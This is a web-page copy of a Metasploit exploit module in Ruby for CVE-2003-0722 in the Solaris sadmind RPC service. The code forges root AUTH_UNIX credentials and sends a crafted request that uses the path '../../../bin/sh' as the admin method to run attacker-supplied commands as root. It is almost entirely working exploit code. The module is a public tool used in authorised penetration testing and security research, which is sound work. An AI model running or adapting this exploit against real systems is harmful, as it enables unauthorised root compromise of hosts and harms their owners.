Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/solaris/sunrpc/sadmind_exec.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::SunRPC910def initialize(info = {})11super(update_info(info,12'Name' => 'Solaris sadmind Command Execution',13'Description' => %q{14This exploit targets a weakness in the default security15settings of the sadmind RPC application. This server is16installed and enabled by default on most versions of the17Solaris operating system.1819Vulnerable systems include solaris 2.7, 8, and 920},21'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],22'License' => MSF_LICENSE,23'References' =>24[25['CVE', '2003-0722'],26['OSVDB', '4585'],27['BID', '8615']28],29'Privileged' => true,30'Platform' => %w{ solaris unix },31'Arch' => ARCH_CMD,32'Payload' =>33{34'Space' => 2000,35'BadChars' => "\x00",36'DisableNops' => true,37'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,38'Compat' =>39{40'PayloadType' => 'cmd',41'RequiredCmd' => 'generic perl telnet',42}43},44'Targets' => [ ['Automatic', { }], ],45'DisclosureDate' => '2003-09-13',46'DefaultTarget' => 047))4849register_options(50[51OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),52OptInt.new('GID', [false, 'GID to emulate', 0]),53OptInt.new('UID', [false, 'UID to emulate', 0])54], self.class55)56end5758def exploit59sunrpc_create('udp', 100232, 10)60sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])6162if !datastore['HOSTNAME']63print_status('attempting to determine hostname')64response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")6566if !response67print_error('no response')68return69end7071match = /Security exception on host (.*)\. USER/.match(response)72if match73hostname = match.captures[0]74print_status("found hostname: #{hostname}")75else76print_error('unable to determine hostname')77return78end79else80hostname = datastore['HOSTNAME']81end8283sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])84response = sadmind_request(hostname, payload.encoded)85sunrpc_destroy8687if /Security exception on host/.match(response)88print_error('exploit failed')89return90else91print_status('exploit did not give us an error, this is good...')92select(nil,nil,nil,1)93handler94end95end9697def sadmind_request(host, command)98header =99Rex::Encoder::XDR.encode(0) * 7 +100Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,1014, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,102host, 'system', '../../../bin/sh')103104body =105do_int('ADM_FW_VERSION', 1) +106do_string('ADM_LANG', 'C') +107do_string('ADM_REQUESTID', '00009:000000000:0') +108do_string('ADM_CLASS', 'system') +109do_string('ADM_CLASS_VERS', '2.1') +110do_string('ADM_METHOD', '../../../bin/sh') +111do_string('ADM_HOST', host) +112do_string('ADM_CLIENT_HOST', host) +113do_string('ADM_CLIENT_DOMAIN', '') +114do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +115do_int('ADM_FENCE', 0) +116do_string('X', '-c') +117do_string('Y', command) +118Rex::Encoder::XDR.encode('netmgt_endofargs')119120request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body121122ret = sunrpc_call(1, request)123return Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]124end125126def do_string(str1, str2)127Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)128end129130def do_int(str, int)131Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)132end133end134135136